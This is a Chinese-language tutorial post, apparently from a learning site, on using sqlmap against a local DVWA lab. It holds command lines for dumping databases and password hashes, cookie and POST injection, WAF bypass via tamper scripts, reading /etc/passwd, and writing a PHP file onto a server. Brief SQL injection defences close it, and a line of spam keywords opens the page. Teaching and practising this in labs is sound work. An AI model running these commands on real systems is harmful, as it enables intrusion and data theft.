亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

為了賬號安全,請及時綁定郵箱和手機立即綁定

對于sqlmap學習的一些總結

標簽:
MySQL

1.首先得安装python2.7然后下载sqlmap源码之后配置环境变量 cmd进入命令行,输入sqlmap.py回车,安装成功
2.搭建测试环境
---------1.php运行环境
---------2.www.dvwa.co.uk ,下载dvwa源码(测试源码)解压到web运行目录
<VirtualHost *:80>
ServerName dvwa.localhost
ServerAlias localhost
DocumentRoot F:/wamp/www/DVWA-master
<Directory "F:/wamp/www/DVWA-master">
Options +Indexes +Includes +FollowSymLinks +MultiViews
AllowOverride All
Require local
</Directory>
</VirtualHost>
以上是修改appache的配置
-------------3.配置虚拟域名C:\Windows\system32\drivers\etc
127.0.0.1 dvwa.localhost 之后在cmd ping dvwa.localhost
-------4.修改F:\wamp\www\DVWA-master\config 添加数据库账号 密码
--------5.登陆账号 密码 admin password

3.sqlmap使用
python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入
python sqlmap.py -u 地址 -v 1 --dbs // 列举数据库列表
python sqlmap.py -u 地址 -v 1 --current-db// 显示当前数据库
python sqlmap.py -u 地址 -v 1 --users // 列举所有数据库用户
python sqlmap.py -u 地址 -v 1 --current-user // 显示当前用户
python sqlmap.py -u 地址 -v 1 -D "database_name" --tables // 列举databas的所有表
python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" --columns // 列举所有字段
python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" -C"columns1,columns2" –dump //导出相关字段
而且SQLMAP会将数据存储在sqlmap/output/
post注入:
先用抓包工具把post的内容拷贝到文件里面去,命名为post.txt
python sqlmap.py -r post.txt -p "user_name,pass"
-r 是指定post请求的文件
-p 是注入需要提交的参数
也可以利用下面的方式进行post注入
python sqlmap.py -u 地址 --forms //自动判断注入
python sqlmap.py -u 地址 --data "指定参数"
3.cookie注入:
如果POST跟GET请求注入都失败的话,可以尝试cookie注入试下。当使用–level 参数>=2的时候sqlmap会检查cookie的参数,先将cookie的信息从请求中复制下来
python sqlmap.py -u 地址 --cookie "参数" --tables --level 2
4.绕过waf防火墙:
假设我们在注入相关地址的时候碰到防火墙可以利用如下方式绕过防火墙
python sqlmap.py -u 地址 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
在sqlmap 的 tamper目录下有很多py 编码脚本自行加载
5.下面是几个常用实例:
1.读取数据库版本,当前用户,当前数据库
python sqlmap -u 地址 -f -b –current-user –current-db -v 1
2.判断当前数据库用户权限
python sqlmap -u 地址 –privileges -U 用户名 -v 1
python sqlmap -u 地址 –is-dba -U 用户名 -v 1
3.读取所有数据库用户或指定数据库用户的密码
python sqlmap -u 地址 –users –passwords -v 2
python sqlmap -u 地址 –passwords -U root -v 2
4.file-read读取web文件
python sqlmap -u 地址 –file-read “/etc/passwd” -v 2
5.file-write写入文件到web
python sqlmap -u 地址 –file-write /localhost/mm.php –file-dest
那么我们如何对SQL注入进行防护呢(这边是针对PHP的)
如果数据库驱动支持PDO或者mysqli的话可以使用绑定参数的方式来直接避免SQL注入
如果数据库驱动只支持mysql的话字符串可以使用mysql_real_escape_string来过滤,如果为其他类型的话直接强制转化(如int)这样就能避免大部分SQL注入。

點擊查看更多內容
TA 點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優質文章

正在加載中
  • 推薦
  • 評論
  • 收藏
  • 共同學習,寫下你的評論
感謝您的支持,我會繼續努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學

大額優惠券免費領

立即參與 放棄機會
微信客服

購課補貼
聯系客服咨詢優惠詳情

幫助反饋 APP下載

慕課網APP
您的移動學習伙伴

公眾號

掃描二維碼
關注慕課網微信公眾號

舉報

0/150
提交
取消